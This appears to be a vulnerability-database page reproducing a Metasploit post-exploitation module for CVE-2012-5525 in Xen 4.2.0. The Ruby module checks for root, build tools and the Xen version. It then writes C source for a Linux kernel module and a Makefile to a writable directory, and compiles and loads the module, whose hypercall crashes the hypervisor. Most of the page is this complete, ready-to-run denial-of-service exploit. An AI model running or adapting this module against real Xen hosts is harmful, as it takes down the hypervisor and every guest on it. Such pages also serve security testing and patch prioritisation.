Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux DoS Xen 4.2.0 2012-5525

🗓️ 13 Apr 2016 01:31:02Reported by Christoph Sendner <[email protected]>, Aleksandar Milenkoski <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 49 Views

This module causes a hypervisor crash in Xen 4.2.0 when invoked from a paravirtualized VM, including from dom0. Successfully tested on Debian 7 3.2.0-4-amd64 with Xen 4.2.0

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2012-5525
29 May 201815:50
circl
CVE		CVE-2012-5525
13 Dec 201211:00
cve
Cvelist		CVE-2012-5525
13 Dec 201211:00
cvelist
Debian CVE		CVE-2012-5525
13 Dec 201211:00
debiancve
EUVD		EUVD-2012-5417
7 Oct 202500:30
euvd
Fedora		[SECURITY] Fedora 18 Update: xen-4.2.0-6.fc18
12 Dec 201200:16
fedora
Tenable Nessus		Fedora 18 : xen-4.2.0-6.fc18 (2012-19652)
12 Dec 201200:00
nessus
Tenable Nessus		GLSA-201309-24 : Xen: Multiple vulnerabilities
28 Sep 201300:00
nessus
Gentoo Linux		Xen: Multiple vulnerabilities
27 Sep 201300:00
gentoo
NVD		CVE-2012-5525
13 Dec 201211:53
nvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux DoS Xen 4.2.0 2012-5525',
        'Description' => %q{
          This module causes a hypervisor crash in Xen 4.2.0 when invoked from a
          paravirtualized VM, including from dom0.  Successfully tested on Debian 7
          3.2.0-4-amd64 with Xen 4.2.0.
        },
        'References' => [ ['CVE', '2012-5525'] ],
        'License' => MSF_LICENSE,
        'Author' => [
          'Christoph Sendner <christoph.sendner[at]stud-mail.uni-wuerzburg.de>',
          'Aleksandar Milenkoski  <aleksandar.milenkoski[at]uni-wuerzburg.de>'
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ARCH_X64],
        'SessionTypes' => ['shell']
      )
    )

    register_options(
      [
        OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp'])
      ], self.class
    )
  end

  def run
    # Variables
    @rand_folder = '/' + Rex::Text.rand_text_alpha(rand(7..11)).to_s
    @writeable_folder = datastore['WritableDir'].to_s + @rand_folder

    # Testing requirements
    print_status('Detecting requirements...')
    return unless requirements_met?

    # Cearting and writing random paths and files
    vprint_status('Creating random file and folder names')
    write_files

    # Execute make and insmod
    do_insmod

    # Testing success of DoS
    test_success
  end

  ##
  # Test all requirements:
  #  - root-priviliges
  #  - build-essentials
  #  - xen-enviroment (existing, not running)
  #  - xen-running
  #  - xen-version (DoS only works on specific versions)
  ##

  def requirements_met?
    unless is_root?
      print_error('Root access is required')
      return false
    end
    print_good('Detected root privilege')

    unless build_essential?
      print_error('No build-essential package found')
      return false
    end
    print_good('Detected build-essential')

    unless xen?
      print_error('Running Xen was not found')
      return false
    end
    print_good('Detected Xen')

    unless xen_running?
      print_error('Xen is not running')
      return false
    end
    print_good('Detected running Xen')

    unless right_xen_version?
      print_error('Incorrect Xen version running')
      return false
    end
    print_good('Detected correct Xen version')

    true
  end

  ##
  # Checks for build essentials
  #  - Required for building a lkm
  #  - checks for gcc/g++, make and linux-headers
  #  - commands sh-conform
  ##

  def build_essential?
    check_command = 'if [ -s $( which gcc ) ] && '
    check_command << '[ -s $( which g++ ) ] && '
    check_command << '[ -s $( which make ) ] && '
    check_command << '[ "$( dpkg -l | grep linux-headers-$(uname -r) )" != "" ] ;'
    check_command << 'then echo OK;'
    check_command << 'fi'

    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for running Xen Hypervisor
  #  - Looks for Xen in lsmod, lscpu, dmesg and /sys/bus
  #  - commands sh-conform
  ##

  def xen?
    check_command = 'if [ "$( lsmod | grep xen )" != "" ] || '
    check_command << '[ "$( lscpu | grep Xen )" != "" ] || '
    check_command << '[ "$( dmesg | grep xen )" != "" ] || '
    check_command << '[ "$( which xl )" != "" ] ;'
    check_command << 'then echo OK;'
    check_command << 'fi'

    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for running Xen
  #  - Host eventually has Xen installed, but not running
  #  - DoS needs a running Xen on Host
  ##

  def xen_running?
    check_command = 'if [ -f /var/run/xenstored.pid -o -f /var/run/xenstore.pid ] ; then echo OK; fi'

    cmd_exec(check_command).delete("\r") == 'OK'
  end

  ##
  # Checks for Xen Version
  #  - Most DoS of Xen require a specific version - here: 4.2.0
  #  - commands need running Xen - so execute after test for xen
  ##

  def right_xen_version?
    cmd_major = "xl info | grep xen_major | grep -o '[0-9]*'"
    xen_major = cmd_exec(cmd_major).delete("\r")
    cmd_minor = "xl info | grep xen_minor | grep -o '[0-9]*'"
    xen_minor = cmd_exec(cmd_minor).delete("\r")
    cmd_extra = "xl info | grep xen_extra | grep -o '[0-9]*'"
    xen_extra = cmd_exec(cmd_extra).delete("\r")

    xen_version = xen_major + '.' + xen_minor + '.' + xen_extra

    print_status('Xen Version: ' + xen_version)

    xen_version == '4.2.0'
  end

  ##
  # Creating and writing files:
  #  - c_file for c-code
  #  - Makefile
  ##

  def write_files
    @c_name = Rex::Text.rand_text_alpha(rand(7..11)).to_s
    @c_file = "#{@writeable_folder}/#{@c_name}.c"
    @make_file = "#{@writeable_folder}/Makefile"

    vprint_status("Creating folder '#{@writeable_folder}'")
    cmd_exec("mkdir #{@writeable_folder}")

    vprint_status("Writing C code to '#{@c_file}'")
    write_file(@c_file, c_code)
    vprint_status("Writing Makefile to '#{@make_file}'")
    write_file(@make_file, make_code)
  end

  ##
  # Compiling and execute LKM
  ##

  def do_insmod
    cmd_exec("cd #{@writeable_folder}")
    vprint_status('Making module...')
    cmd_exec('make')
    vprint_status("Insmod '#{@writeable_folder}/#{@c_name}.ko'")
    cmd_exec("insmod #{@writeable_folder}/#{@c_name}.ko")
  end

  ##
  # Test for success via ssh-error exception
  #  - Host down => ssh-error => DoS successful
  ##

  def test_success
    successful = false
    begin
      is_root?
    rescue RuntimeError => e
      successful = true if e.message == 'Could not determine UID: ""'
      raise unless successful
    ensure
      if successful
        print_good('DoS was successful!')
      else
        print_error('DoS has failed')
      end
    end
  end

  ##
  # Returns Makefile to compile
  #  - LKMs need a Makefile
  #  - Needs the linux-headers, make and gcc
  ##

  def make_code
    m = <<~END
      obj-m := #{@c_name}.o

      EXTRA_CFLAGS+= -save-temps

      all:
      \t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

      clean:
      \t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
    END
    m
  end

  ##
  # Returns the c-Code to compile
  #  - Contains the essential bug to crash Xen
  #  - Here: Force a segmentation fault via hypercall, which crashes the host
  ##

  def c_code
    c = <<~END
      #undef __KERNEL__
      #define __KERNEL__
      #undef MODULE
      #define MODULE
      #include <linux/module.h>
      #include <asm/xen/hypercall.h>
      MODULE_LICENSE("GPL");
      static int __init lkm_init(void)
      {
      struct mmuext_op op;
      int status;
      op.cmd = 16; /*MMUEXT_CLEAR_PAGE*/
      op.arg1.mfn = 0x0EEEEE; /*A large enough MFN*/
      HYPERVISOR_mmuext_op(&op, 1, &status, DOMID_SELF);
      return 0;
      }
      static void __exit lkm_cleanup(void)
      {
      }
      module_init(lkm_init);
      module_exit(lkm_cleanup);
    END
    c
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2023 13:47Current
6.9Medium risk
Vulners AI Score6.9
CVSS 24.7
EPSS0.06889
metasploitxen 4.2.0doshypervisor crashparavirtualized vmdom0debian 72012-5525securitylinuxprivilege escalation
49